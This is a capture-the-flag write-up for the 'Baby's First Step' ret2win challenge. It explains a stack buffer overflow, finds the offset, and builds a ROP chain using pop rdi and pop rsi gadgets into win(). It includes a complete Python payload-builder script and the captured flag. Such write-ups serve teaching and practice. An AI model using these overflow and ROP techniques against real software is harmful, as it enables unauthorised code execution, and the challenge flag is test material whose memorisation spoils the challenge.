PCC CTF - Babys First Step ROP Challenge Writeup

Author: Muhammad Huzaifa

Baby's First Step - Solution

Challenge Analysis

This is a classic stack buffer overflow ret2win challenge, with one twist: win() only spawns a shell when it is called with two specific arguments, so a short ROP chain is needed to load rdi and rsi before returning into it.

Vulnerability

The vuln() function has a stack buffer overflow:

  • It declares a 100-byte stack buffer (char buf[100])
  • But it reads up to 0x100 (256) bytes into that buffer with read(STDIN_FILENO, buf, 0x100)
  • The surplus bytes run past the end of buf, over the saved rbp and the saved return address, so we control where vuln() returns to and the stack above it

Binary Protections

Arch:       amd64-64-little
RELRO:      Full RELRO        ← GOT is read-only, but we never need to write it
Stack:      No canary found   ← The overflow reaches the return address without a leak
NX:         NX enabled        ← Stack is not executable, so no shellcode; we use ROP instead
PIE:        No PIE            ← Fixed addresses, so gadgets and win() can be hardcoded

Goal

Return into the win() function with the two argument values it checks for (System V AMD64 passes the first two integer arguments in rdi and rsi):

  • rdi (first argument) = 0x1337133713371337
  • rsi (second argument) = 0xdeadbeef13377331

Solution

Step 1: Find the offset

Sending a cyclic (de Bruijn) pattern and reading the faulting return address in gdb, the offset from the start of buf to the saved return address is 120 bytes.

Stack layout (buf is declared as 100 bytes, but the compiler pads the frame to 16-byte alignment, so 112 bytes precede the saved rbp):

[buffer + alignment padding: 112 bytes] [saved rbp: 8 bytes] [return address: 8 bytes]

Step 2: Build ROP chain

The binary contains a gift() function whose only purpose is to provide the ROP gadgets we need (confirmed with ROPgadget and objdump):

  • pop rdi; ret at 0x4012c2
  • pop rsi; ret at 0x4012c4

ROP chain, written in the order it sits on the stack (each entry is a little-endian 8-byte qword):

padding (120 bytes)          ← fills buf, the alignment padding and the saved rbp
pop rdi; ret  (0x4012c2)     ← overwrites the return address; vuln()'s ret jumps here
0x1337133713371337           ← popped into rdi
pop rsi; ret  (0x4012c4)
0xdeadbeef13377331           ← popped into rsi
win           (0x40121b)     ← the second ret lands in win() with both arguments set

The whole payload is 120 + 5 * 8 = 160 bytes, well inside the 0x100 bytes that read() accepts.

Step 3: Exploit

win() compares rdi and rsi against the expected values and, if both match, calls execve() on /bin/sh, which drops us into a shell from which the flag can be read. Should win() fault on a movaps instruction instead of giving a shell, insert one extra ret gadget before its address to restore 16-byte stack alignment.
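The offset discovery from Step 1 and the chain from Steps 2 and 3, written out as an added example (this is not the writeup author's exploit script). It deliberately avoids pwntools so it runs anywhere: p64() and the de Bruijn cyclic()/cyclic_find() pair are re-implemented, using the same generator order as pwntools so the pattern is byte-for-byte identical. The addresses and argument values are the ones reported above; the binary name ./chall and the location of a bare ret one byte into the pop rdi gadget are assumptions.

```python
"""
Offset discovery and ROP-chain construction for the "Baby's First Step"
ret2win challenge. Added example, not the writeup author's script.
"""
import itertools
import struct
import sys

# Facts taken from the writeup
OFFSET = 120                 # bytes from the start of buf to the saved return address
POP_RDI = 0x4012C2           # pop rdi ; ret   (inside gift())
POP_RSI = 0x4012C4           # pop rsi ; ret   (inside gift())
WIN = 0x40121B               # win(rdi, rsi) -> execve("/bin/sh", ...)
ARG1 = 0x1337133713371337    # value win() expects in rdi
ARG2 = 0xDEADBEEF13377331    # value win() expects in rsi
READ_SIZE = 0x100            # read(STDIN_FILENO, buf, 0x100): upper bound on the payload
# Assumption: "pop rdi ; ret" is the 2-byte encoding 5f c3, so a bare "ret" sits one
# byte in. Only used if win() ever faults on a 16-byte stack-alignment check.
RET = POP_RDI + 1


def p64(value):
    """Pack an integer as a little-endian 64-bit qword (what pwntools' p64 does)."""
    return struct.pack("<Q", value)


def de_bruijn(alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Yield B(k, n) one byte at a time. Every n-byte window occurs exactly once,
    so any 4 bytes read out of a crash register pin down their offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for x in a[1:p + 1]:
                    yield alphabet[x]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (matches pwntools' cyclic(length))."""
    return bytes(itertools.islice(de_bruijn(n=n), length))


def cyclic_find(needle, n=4):
    """Offset of `needle` in the pattern. Accepts bytes or the crashed RIP/RSP value
    as an int (its low 4 bytes are the pattern chunk); returns -1 if not found."""
    if isinstance(needle, int):
        needle = p64(needle)
    needle = bytes(needle[:n])
    window = bytearray()
    for i, byte in enumerate(de_bruijn(n=n)):
        window.append(byte)
        del window[:-n]                   # keep only the last n bytes
        if window == needle:
            return i - n + 1
    return -1


def build_payload(align=False):
    """padding | pop rdi ; ret | ARG1 | pop rsi ; ret | ARG2 | [ret] | win"""
    chain = [POP_RDI, ARG1, POP_RSI, ARG2]
    if align:
        chain.append(RET)                 # realign RSP to 16 bytes before win()
    chain.append(WIN)
    payload = b"A" * OFFSET + b"".join(p64(g) for g in chain)
    if len(payload) > READ_SIZE:
        raise ValueError("chain does not fit in the 0x100-byte read()")
    return payload


def frame_after_overflow(payload):
    """Map stack offset (from buf) -> qword, from the saved-rbp slot onward, to show
    what vuln()'s epilogue pops and what each ret in the chain consumes."""
    return {off: struct.unpack("<Q", payload[off:off + 8])[0]
            for off in range(OFFSET - 8, len(payload), 8)}


if __name__ == "__main__":
    # Usage:  python3 exploit.py --pattern > pat.bin   (crash pattern for gdb)
    #         (python3 exploit.py; cat) | ./chall       (send chain, keep stdin open)
    if "--pattern" in sys.argv:
        sys.stdout.buffer.write(cyclic(READ_SIZE))
    else:
        sys.stdout.buffer.write(build_payload("--align" in sys.argv))
```

Run it once with --pattern, feed pat.bin to the binary under gdb, and pass the faulting RIP (or the qword at RSP) to cyclic_find() to recover 120. With pwntools installed the same payload goes out as p.send(build_payload()) followed by p.interactive(); the trailing cat in the pipeline above does the same job of keeping stdin open for the spawned shell.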

Flag

PCC{oh_l00k_maa_my_f1rst_ret2w1n_XESSMQF80FMwvL43HDPf}

Tools Used

  • checksec - Check binary protections (no canary, NX, no PIE)
  • gdb - Crash the binary with the cyclic pattern, read the faulting address, and test the payload
  • objdump - Disassemble the binary to find the addresses of win() and gift()
  • ROPgadget - Find the pop rdi; ret and pop rsi; ret gadgets
  • pwntools - Generate the cyclic pattern, build the payload, and talk to the process